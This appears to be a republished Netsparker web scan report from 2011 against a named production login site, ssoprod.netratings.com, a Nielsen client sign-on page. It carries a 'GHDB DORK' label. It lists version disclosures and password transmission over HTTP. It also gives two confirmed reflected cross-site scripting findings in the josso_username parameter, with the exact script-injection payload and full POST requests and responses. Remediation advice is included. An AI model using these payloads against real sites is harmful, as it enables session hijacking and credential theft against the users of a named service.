ssoprod.netratings.com, XSS GHDB DORK REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


Loading

Netsparker - Scan Report Summary
TARGET URL
http://ssoprod.netratings.com/josso/signon/?p...
SCAN DATE
4/29/2011 9:20:35 AM
REPORT DATE
4/29/2011 12:49:06 PM
SCAN DURATION
00:01:18
10
identified
5
confirmed
0
critical
2
informational

GHDB DORK Tests

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Cross-site Scripting
Authentication
Scheduled

GHDB, DORK VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
30 %
LOW
50 %
INFORMATION
20 %

GHDB, DORK VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/josso/ Apache Version Disclosure No
/josso/ref/ Tomcat Version Disclosure No
Directory Listing (Tomcat) No
/josso/ref/enterSubmit.js Java Servlet Version Disclosure No
/josso/signon/ Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
Cookie Not Marked As HttpOnly Yes
E-mail Address Disclosure No
/josso/signon/usernamePasswordLogin.do josso_username POST Cross-site Scripting Yes
/josso/signon/usernamePasswordLogin.do;jsessionid=3AA761F94AA76886B4516B6961127C9C.a01 josso_username POST Cross-site Scripting Yes
Cross-site Scripting

Cross-site Scripting

2 TOTAL
IMPORTANT
CONFIRMED
2
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /josso/signon/usernamePasswordLogin.do;jsessionid=3AA761F94AA76886B4516B6961127C9C.a01

/josso/signon/usernamePasswordLogin.do;jsessionid=3AA761F94AA76886B4516B6961127C9C.a01 CONFIRMED

http://ssoprod.netratings.com/josso/signon/usernamePasswordLogin.do;jsessionid=3AA761F94AA76886B4516..

Parameters

Parameter Type Value
input_username POST ='Username'){this.value=''};
josso_cmd POST login
josso_password POST ='password'){this.value=''};
josso_username POST '"--></style></script><script>alert(0x0003B1)</script>
product_id POST 6

Request

POST /josso/signon/usernamePasswordLogin.do;jsessionid=3AA761F94AA76886B4516B6961127C9C.a01 HTTP/1.1
Referer: http://ssoprod.netratings.com/josso/signon/?product_id=6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: ssoprod.netratings.com
Cookie: JSESSIONID=3AA761F94AA76886B4516B6961127C9C.a01
Content-Length: 237
Accept-Encoding: gzip, deflate

input_username=%3d'Username')%7bthis.value%3d''%7d%3b&josso_cmd=login&josso_password=%3d'password')%7bthis.value%3d''%7d%3b&josso_username='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003B1)%3c%2fscript%3e&product_id=6

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 14:21:33 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=iso-8859-1
Transfer-Encoding: chunked


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>Nielsen Online Client Login : Login Error</title><link type="text/css" rel="stylesheet" href="../ref/nielsen_login.css"><script type="text/javascript" src="../ref/nav.js"></script><script type="text/javascript" src="../ref/topnav_MM.js"></script><script type="text/javascript" src="../ref/nav.js"></script><script type="text/javascript" src="../ref/login_cookie.js"></script><script type="text/javascript" src="../ref/enterSubmit.js"></script><script type="text/javascript" src="../ref/focusForm.js"></script><script type="text/javascript" src="../ref/topnav_MM.js"></script><script type="text/javascript" src="../ref/nn_click.js"></script><script type="text/javascript" src="../ref/form.js"></script><style type="text/css"><!--.style1 { color: #6ea3ba; font-weight: bold;}.mess {font-family:Arial, Helvetica, sans-serif; font-size:15px; font-weight:bold; color:#009dd9;line-height: 19px;padding: 0px 0px 0px 0px;margin:10px 13px 20px 24px;}--></style></head><body onload="if (window.pageOnLoad) window.pageOnLoad()"><table width="100%" cellpadding="0" cellspacing="0" border="0" height="100%"> <tr bgcolor="#ffffff" height="11%"> <td align="center" height="68"> <!--header--> <table width="966" cellpadding="0" cellspacing="0" border="0" height="68"> <tr> <td align="left"><a href="http://www.nielsen.com"><img src="../ref/nielsen.gif" width="140" height="68" border="0"></a></td> </tr> </table></td> </tr> <tr bgcolor="#b1c9d4" height="82%"> <td align="center" valign="top"> <!--page content--> <table width="966" cellpadding="0" cellspacing="0" border="0"> <tr height="10"> <td colspan="2"> </td> </tr> <tr> <td align="left" valign="top"> <!--bd left--> <div id="left"> <div class="CLI"> <img src="../ref/banner.gif" alt="Nielsen MObile Media Login"> <div class="decoTop">&nbsp;</div> <div class="title"><span class="subtitle"><img src="../ref/login.gif" alt="lock" border="0"></span>Online Division Client Login<br><img src="http://www.netratings.com/img/en/global/transparent.gif" width="25" height="8"><span class="subtitle2">NetRatings, BuzzMetrics, Mobile Media</span></div> <!-- change start for RT 65056 --><!-- <div class="mess"><u>Important Message:</u> The NetView service will be undergoing scheduled maintenance between 10 PM EDT October 2nd through 10 PM EDT October 5th. There may be a few brief interruptions lasting no more than a few minutes each, but the service is expected to remain mostly available throughout this period.</div>--><!-- change end for RT 65056 --> <div class="frame2"> <span class="text">Are you a client with questions? <a target="_new" href="mailto:netratingsclientservices@nielsen.com">Contact us</a> </span><br><img src="http://www.netratings.com/img/en/global/transparent.gif" width="8" height="5"> <div class="border"> <table width="606"> <tr> <td width="243"> <!--<div class="subtitle"></div>--> <p>&nbsp;</p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://ssoprod.netratings.com/josso/signon/?product_id=7">NetView</a></p> <!-- <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_jpbz.htm">NetView Japan and Brazil Banner Track</a></p> --> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_vc.htm">VideoCensus</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_ari.htm">AdRelevance</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<span class="style1">@Plan</span></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_hso.htm">Homescan Online</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_mvw.htm">MegaView</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_scs.htm">SiteCensus</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_ca.htm">Campaign Analysis</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_adi.htm">AdIntelligence</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_mki.htm">Market Intelligence</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_sur.htm">Survey Results</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.imseverywhere.com/Citrix/MetaFrame/auth/login.aspx">WebRF</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://my.buzzmetrics.com/">Nielsen BuzzMetrics</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://telecom.nielsen.com/mobilemedia/">Nielsen Mobile Media</a></p> <p>&nbsp;</p></td> <td width="55">&nbsp;</td> <td width="292" align="left" valign="top"> <p>&nbsp;</p> <!--<SPAN style='font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;font-weight:bold;font-size:10pt' id='productTitle'>NetView</SPAN> --> <table width="100%" cellpadding="0" cellspacing="0" border="0" > <tr> <td align="center" class="label"> <table cellpadding="20" cellspacing="3" border="0" > <tr> <td align="center" style="color:red;font-weight:bolder;font-size=12pt;text-align:center;"> Login denied. <div style="visibility:hidden;display:none">Error : During credentials listing: ERROR: invalid input syntax for integer: "'"--></style></script><script>netsparker(0x0003B1)</script>"</div> </td> </tr> <tr> <td align="center">Having trouble logging in? <br/>Please contact your Account Management team or email:</td> <table><tr><td align="left">USA: </td><td align="right"><a href="mailto:clientservices@netratings.com"> clientservices@netratings.com </a></td><tr><tr><td align="left">Spain: </td><td align="right"><a href="mailto:Client.es@nielsen.com"> Client.es@nielsen.com </a></td><tr><tr><td align="left">Italy: </td><td align="right"><a href="mailto:ClientServiceIT@netratings.com">ClientServiceIT@netratings.com</a></td><tr><tr><td align="left">Germany:</td><td align="right"><a href="mailto:ClientServiceDE@netratings.com">ClientServiceDE@netratings.com </a></td><tr><tr><td align="left">France: </td><td align="right"><a href="mailto:msaint@mediametrie.fr"> msaint@mediametrie.fr </a></td><tr><tr><td align="left">UK: </td><td align="right"><a href="mailto:clientserviceuk@netratings.com">clientserviceuk@netratings.com </a></td><tr><tr><td align="left">Australia: &nbsp</td><td align="right"><a href="mailto:careau@nielsen.com"> careau@nielsen.com</a></td><tr><tr><td align="left">Japan:</td><td align="right"><a href="mailto:clientservices@netratings.co.jp"> clientservices@netratings.co.jp</a></td><tr> <table> </td> </tr> <tr> <td align="center"><hr/><br/><A href="/josso/signon/logout.do?product_id=-1">Click here to return to the Nielsen Online products page.</a></td> </tr> </table> </td> </tr> </table> <p>&nbsp;</p> <p>&nbsp;</p> <script language="javascript" src="../ref/login_cookie_autofill.js"></script> <a id="popup" href="#" style="z-index:1">Browers/Support Details <span id="popbox"> <div class="rem"> <u>Browsers Supported</u>:<br> IE 6.0+<br> FireFox 1.0+<br> <br> <u>Other Requirements</u>:<br> Windows XP, 2000, 98, NT4<br>Mac OS X <br> Screen Resolution: 1024x768<br> JavaScript 1.2+<br> Cookies enabled<br> Flash 3+ (recommended) </div> </span></a> </td> </tr> </table> </div> <div class="servSpec">This product and associated modules and services are protected by one or more of the following United States patents and their foreign counterparts: 5,675,510, 5,796,952, 6,108,637, 6,115,680, 6,138,155, 6,643,696 and 6,673,386. Other patents pending. </div> </div> <br> <div class="decoBottom">&nbsp;</div> </div> </div></td> <!--<div class="REL"> --> <td valign="top"> <!--bd right--> <div id="right"> <div class="REL" align="left"> <div class="title" align="left">&nbsp;&nbsp;Important Product News</div> <table border="0" cellpadding="0" cellspacing="4" class="item"> <!--<tr> <td colspan="2"> <div class="text"> <p>Request a Demo</p> </div> </td> </tr>--> <tr> <td ><div class="icon"><img src="../ref/arrow_blue.gif" alt="image" width="8" height="12" /></div></td> <td ><div class="text"><a href="http://www.nielsen-online.com/emc/0905_RDD_demo_reg/reg.jsp" target="_blank">NetView RDD Demo Signup</a></div></td> </tr> <tr> <td><div class="icon"><img src="../ref/arrow_blue.gif" alt="image" width="8" height="12" /></div></td> <td><div class="text"><a href="http://www.nielsen-online.com/resources.jsp?section=training_form&nav=3" target="_blank">Product Training</a></div></td> </tr> <tr> <td><div class="icon"><img src="../ref/arrow_blue.gif" alt="image" width="8" height="12" /></div></td> <td><div class="text"><a href="mailto:netratingsclientservices@nielsen.com" target="_blank">Client Services</a></div></td> </tr> <tr> <td><div class="icon"><img src="../ref/arrow_blue.gif" alt="image" width="8" height="12" /></div></td> <td><div class="text"><a href="http://en-us.nielsen.com/main/insights/webinars" target="_blank">Upcoming Webinars</a></div></td> </tr> </table> <div class="decoBottom">&nbsp;</div> </div> </div> <div class="spacer">&nbsp;</div> <div id="right"> <div class="REL"> <div class="title" align="left">&nbsp;&nbsp;Enhanced Methodology</div> <table border="0" cellpadding="0" cellspacing="4" class="item"> <tr> <td><div class="text">Nielsen is pleased to announce the official launch of our largest, most representative Online audience measurement panel ever in the U.S. The enhanced panel is more than eight times larger than the previous sample, providing greater granularity and deeper demographics. <br>Click here to learn more, or contact your <a href="mailto:netratingsclientservices@nielsen.com" target="_blank"> Account Manager</a>. </div></td> </tr> </table> <div class="decoBottom">&nbsp;</div> </div> </div><div class="spacer">&nbsp;</div> <div id="right" > <div class="REL"> <!-- Changed for ticket # HD666184 --> <div class="title2" align="left">&nbsp;&nbsp;Nielsen @Plan New Interface</div> <table border="0" cellpadding="0" cellspacing="4&quo..
- /josso/signon/usernamePasswordLogin.do

/josso/signon/usernamePasswordLogin.do CONFIRMED

http://ssoprod.netratings.com/josso/signon/usernamePasswordLogin.do

Parameters

Parameter Type Value
input_username POST ='Username'){this.value=''};
josso_cmd POST login
josso_password POST ='password'){this.value=''};
josso_username POST '"--></style></script><script>alert(0x0003B7)</script>
product_id POST 7

Request

POST /josso/signon/usernamePasswordLogin.do HTTP/1.1
Referer: http://ssoprod.netratings.com/josso/signon/?product_id=7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: ssoprod.netratings.com
Cookie: JSESSIONID=3AA761F94AA76886B4516B6961127C9C.a01
Content-Length: 237
Accept-Encoding: gzip, deflate

input_username=%3d'Username')%7bthis.value%3d''%7d%3b&josso_cmd=login&josso_password=%3d'password')%7bthis.value%3d''%7d%3b&josso_username='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003B7)%3c%2fscript%3e&product_id=7

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 14:21:37 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=iso-8859-1
Transfer-Encoding: chunked


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>Nielsen Online Client Login : Login Error</title><link type="text/css" rel="stylesheet" href="../ref/nielsen_login.css"><script type="text/javascript" src="../ref/nav.js"></script><script type="text/javascript" src="../ref/topnav_MM.js"></script><script type="text/javascript" src="../ref/nav.js"></script><script type="text/javascript" src="../ref/login_cookie.js"></script><script type="text/javascript" src="../ref/enterSubmit.js"></script><script type="text/javascript" src="../ref/focusForm.js"></script><script type="text/javascript" src="../ref/topnav_MM.js"></script><script type="text/javascript" src="../ref/nn_click.js"></script><script type="text/javascript" src="../ref/form.js"></script><style type="text/css"><!--.style1 { color: #6ea3ba; font-weight: bold;}.mess {font-family:Arial, Helvetica, sans-serif; font-size:15px; font-weight:bold; color:#009dd9;line-height: 19px;padding: 0px 0px 0px 0px;margin:10px 13px 20px 24px;}--></style></head><body onload="if (window.pageOnLoad) window.pageOnLoad()"><table width="100%" cellpadding="0" cellspacing="0" border="0" height="100%"> <tr bgcolor="#ffffff" height="11%"> <td align="center" height="68"> <!--header--> <table width="966" cellpadding="0" cellspacing="0" border="0" height="68"> <tr> <td align="left"><a href="http://www.nielsen.com"><img src="../ref/nielsen.gif" width="140" height="68" border="0"></a></td> </tr> </table></td> </tr> <tr bgcolor="#b1c9d4" height="82%"> <td align="center" valign="top"> <!--page content--> <table width="966" cellpadding="0" cellspacing="0" border="0"> <tr height="10"> <td colspan="2"> </td> </tr> <tr> <td align="left" valign="top"> <!--bd left--> <div id="left"> <div class="CLI"> <img src="../ref/banner.gif" alt="Nielsen MObile Media Login"> <div class="decoTop">&nbsp;</div> <div class="title"><span class="subtitle"><img src="../ref/login.gif" alt="lock" border="0"></span>Online Division Client Login<br><img src="http://www.netratings.com/img/en/global/transparent.gif" width="25" height="8"><span class="subtitle2">NetRatings, BuzzMetrics, Mobile Media</span></div> <!-- change start for RT 65056 --><!-- <div class="mess"><u>Important Message:</u> The NetView service will be undergoing scheduled maintenance between 10 PM EDT October 2nd through 10 PM EDT October 5th. There may be a few brief interruptions lasting no more than a few minutes each, but the service is expected to remain mostly available throughout this period.</div>--><!-- change end for RT 65056 --> <div class="frame2"> <span class="text">Are you a client with questions? <a target="_new" href="mailto:netratingsclientservices@nielsen.com">Contact us</a> </span><br><img src="http://www.netratings.com/img/en/global/transparent.gif" width="8" height="5"> <div class="border"> <table width="606"> <tr> <td width="243"> <!--<div class="subtitle"></div>--> <p>&nbsp;</p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<span class="style1">NetView</span></p> <!-- <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_jpbz.htm">NetView Japan and Brazil Banner Track</a></p> --> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_vc.htm">VideoCensus</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_ari.htm">AdRelevance</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://ssoprod.netratings.com/josso/signon/?product_id=6">@Plan</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_hso.htm">Homescan Online</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_mvw.htm">MegaView</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_scs.htm">SiteCensus</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_ca.htm">Campaign Analysis</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_adi.htm">AdIntelligence</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_mki.htm">Market Intelligence</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.nielsen-online.com/login/sl_sur.htm">Survey Results</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://www.imseverywhere.com/Citrix/MetaFrame/auth/login.aspx">WebRF</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://my.buzzmetrics.com/">Nielsen BuzzMetrics</a></p> <p class="col"><img alt="thumbnail" src="../ref/arrow_blue.gif" border="0" height="12" width="8">&nbsp;&nbsp;&nbsp;<a target="_self" href="http://telecom.nielsen.com/mobilemedia/">Nielsen Mobile Media</a></p> <p>&nbsp;</p></td> <td width="55">&nbsp;</td> <td width="292" align="left" valign="top"> <p>&nbsp;</p> <!--<SPAN style='font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;font-weight:bold;font-size:10pt' id='productTitle'>NetView</SPAN> --> <table width="100%" cellpadding="0" cellspacing="0" border="0" > <tr> <td align="center" class="label"> <table cellpadding="20" cellspacing="3" border="0" > <tr> <td align="center" style="color:red;font-weight:bolder;font-size=12pt;text-align:center;"> Login denied. <div style="visibility:hidden;display:none">Error : During credentials listing: ERROR: invalid input syntax for integer: "'"--></style></script><script>netsparker(0x0003B7)</script>"</div> </td> </tr> <tr> <td align="center">Having trouble logging in? <br/>Please contact your Account Management team or email:</td> <table><tr><td align="left">USA: </td><td align="right"><a href="mailto:clientservices@netratings.com"> clientservices@netratings.com </a></td><tr><tr><td align="left">Spain: </td><td align="right"><a href="mailto:Client.es@nielsen.com"> Client.es@nielsen.com </a></td><tr><tr><td align="left">Italy: </td><td align="right"><a href="mailto:ClientServiceIT@netratings.com">ClientServiceIT@netratings.com</a></td><tr><tr><td align="left">Germany:</td><td align="right"><a href="mailto:ClientServiceDE@netratings.com">ClientServiceDE@netratings.com </a></td><tr><tr><td align="left">France: </td><td align="right"><a href="mailto:msaint@mediametrie.fr"> msaint@mediametrie.fr </a></td><tr><tr><td align="left">UK: </td><td align="right"><a href="mailto:clientserviceuk@netratings.com">clientserviceuk@netratings.com </a></td><tr><tr><td align="left">Australia: &nbsp</td><td align="right"><a href="mailto:careau@nielsen.com"> careau@nielsen.com</a></td><tr><tr><td align="left">Japan:</td><td align="right"><a href="mailto:clientservices@netratings.co.jp"> clientservices@netratings.co.jp</a></td><tr> <table> </td> </tr> <tr> <td align="center"><hr/><br/><A href="/josso/signon/logout.do?product_id=-1">Click here to return to the Nielsen Online products page.</a></td> </tr> </table> </td> </tr> </table> <p>&nbsp;</p> <p>&nbsp;</p> <script language="javascript" src="../ref/login_cookie_autofill.js"></script> <a id="popup" href="#" style="z-index:1">Browers/Support Details <span id="popbox"> <div class="rem"> <u>Browsers Supported</u>:<br> IE 6.0+<br> FireFox 1.0+<br> <br> <u>Other Requirements</u>:<br> Windows XP, 2000, 98, NT4<br>Mac OS X <br> Screen Resolution: 1024x768<br> JavaScript 1.2+<br> Cookies enabled<br> Flash 3+ (recommended) </div> </span></a> </td> </tr> </table> </div> <div class="servSpec">This product and associated modules and services are protected by one or more of the following United States patents and their foreign counterparts: 5,675,510, 5,796,952, 6,108,637, 6,115,680, 6,138,155, 6,643,696 and 6,673,386. Other patents pending. </div> </div> <br> <div class="decoBottom">&nbsp;</div> </div> </div></td> <!--<div class="REL"> --> <td valign="top"> <!--bd right--> <div id="right"> <div class="REL" align="left"> <div class="title" align="left">&nbsp;&nbsp;Important Product News</div> <table border="0" cellpadding="0" cellspacing="4" class="item"> <!--<tr> <td colspan="2"> <div class="text"> <p>Request a Demo</p> </div> </td> </tr>--> <tr> <td ><div class="icon"><img src="../ref/arrow_blue.gif" alt="image" width="8" height="12" /></div></td> <td ><div class="text"><a href="http://www.nielsen-online.com/emc/0905_RDD_demo_reg/reg.jsp" target="_blank">NetView RDD Demo Signup</a></div></td> </tr> <tr> <td><div class="icon"><img src="../ref/arrow_blue.gif" alt="image" width="8" height="12" /></div></td> <td><div class="text"><a href="http://www.nielsen-online.com/resources.jsp?section=training_form&nav=3" target="_blank">Product Training</a></div></td> </tr> <tr> <td><div class="icon"><img src="../ref/arrow_blue.gif" alt="image" width="8" height="12" /></div></td> <td><div class="text"><a href="mailto:netratingsclientservices@nielsen.com" target="_blank">Client Services</a></div></td> </tr> <tr> <td><div class="icon"><img src="../ref/arrow_blue.gif" alt="image" width="8" height="12" /></div></td> <td><div class="text"><a href="http://en-us.nielsen.com/main/insights/webinars" target="_blank">Upcoming Webinars</a></div></td> </tr> </table> <div class="decoBottom">&nbsp;</div> </div> </div> <div class="spacer">&nbsp;</div> <div id="right"> <div class="REL"> <div class="title" align="left">&nbsp;&nbsp;Enhanced Methodology</div> <table border="0" cellpadding="0" cellspacing="4" class="item"> <tr> <td><div class="text">Nielsen is pleased to announce the official launch of our largest, most representative Online audience measurement panel ever in the U.S. The enhanced panel is more than eight times larger than the previous sample, providing greater granularity and deeper demographics. <br>Click here to learn more, or contact your <a href="mailto:netratingsclientservices@nielsen.com" target="_blank"> Account Manager</a>. </div></td> </tr> </table> <div class="decoBottom">&nbsp;</div> </div> </div><div class="spacer">&nbsp;</div> <div id="right" > <div class="REL"> <!-- Changed for ticket # HD666184 --> <div class="title2" align="left">&nbsp;&nbsp;Nielsen @Plan New Interface</div> <table border="0" cellpadding="0" cellspacing="4&quo..
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /josso/signon/

/josso/signon/ CONFIRMED

http://ssoprod.netratings.com/josso/signon/?product_id=7

Form target action

/josso/signon/usernamePasswordLogin.do

Request

GET /josso/signon/?product_id=7 HTTP/1.1
Referer: http://ssoprod.netratings.com/josso/signon/?product_id=6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ssoprod.netratings.com
Cookie: JSESSIONID=3AA761F94AA76886B4516B6961127C9C.a01
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 14:20:31 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=iso-8859-1
Transfer-Encoding: chunked


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>Nielsen Online Client Login : Login</title><link type="text/css" rel="stylesheet" href="../ref/nielsen_login.css"><script type="text/javascript" src="../ref/nav.js"></script><script type="text/javascript" src="../ref/topnav_MM.js"></script><script type="text/javascript" src="../ref/nav.js"></script><script type="text/javascript" src="../ref/login_cookie.js"></script><script type="text/javascript" src="../ref/enterSubmit.js"></script><script type="text/javascript" src="../ref/focusForm.js"></script><script type="text/javascript" src="../ref/topnav_MM.js"></script><script type="text/javascript" src="../ref/nn_click.js"></script><script type="text/javascript" src="../ref/form.js"></script><style type="text/css"><!--.style1 { color: #6ea3ba; font-weight: bold;}.mess {font-family:Arial, Helvetica, sans-serif; font-size:15px; font-weight:bold; color:#009dd9;line-height: 19px;padding: 0px 0px 0px 0px;margin:10px 13px 20px 24px;}--></style></head><body onload="if (window.pageOnLoad) window.pageOnLoad()"><table width="100%" cellpadding="0" cellspacing="0" border="0" height="100%"> <tr bgcolor="#ffffff" height="11%"> <td align="center" height="68"> <!--header--> <table width="966" cellpadding="0" cellspacing="0" border="0" height="68"> <tr> <td align="left"><a href="http://www.nielsen.com"><img src="../ref/nielsen.gif" width="140" height="68" border="0"></a></td> </tr> </table></td> </tr> <tr bgcolor="#b1c9d4" height="82%"> <td align="center" valign="top"> <!--page content--> <table width="966" cellpadding="0" cellspacing="0" border="0"> <tr height="10"> <td colspan="2"> </td> </tr> <tr> <td align="left" valign="top"> <!--bd left--> <div id="left"> <div class="CLI"> <img src="../ref/banner.gif" alt="Nielsen MObile Media Login"> <div class="decoTop">&nbsp;</div> <div class="title"><span class="subtitle"><img src="../ref/login.gif" alt="lock" border="0"></span>Online Division Client Login<br><img src="http://www.netratings.com/img/en/global/transparent.gif" width="25" height="8"><span class="subtitle2">NetRatings, BuzzMetrics, Mobile Media</span></div> <!-- change start for RT 65056 --><!-- <div class="mess"><u>Important 